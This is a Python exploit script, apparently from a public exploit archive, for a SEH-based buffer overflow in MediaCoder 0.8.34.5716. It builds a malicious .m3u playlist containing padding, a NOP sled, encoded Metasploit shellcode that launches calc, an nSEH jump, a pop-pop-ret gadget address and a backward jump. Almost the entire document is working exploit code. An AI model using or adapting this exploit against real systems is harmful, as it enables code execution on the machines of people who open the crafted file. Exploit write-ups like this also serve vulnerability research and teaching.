#!/usr/bin/python
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also
# avoid a few bad bytes after the "A"s.
#!/usr/bin/python
buffersize = 853
buffer = ("http://" + "\x41" * 256)
#Space for shellcode to decode
buffer += "\x90" * 24
# msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
#unsigned char buf[] =
buffer +=("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
buffer += "\x42" * 350
nseh = "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]
seh="\xee\x04\x01\x66"
#Jump back 603 bytes due to insufficient space for shellcode
jmpbck = "\xe9\xA5\xfd\xff\xff"
junk = ("D" * 55)
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()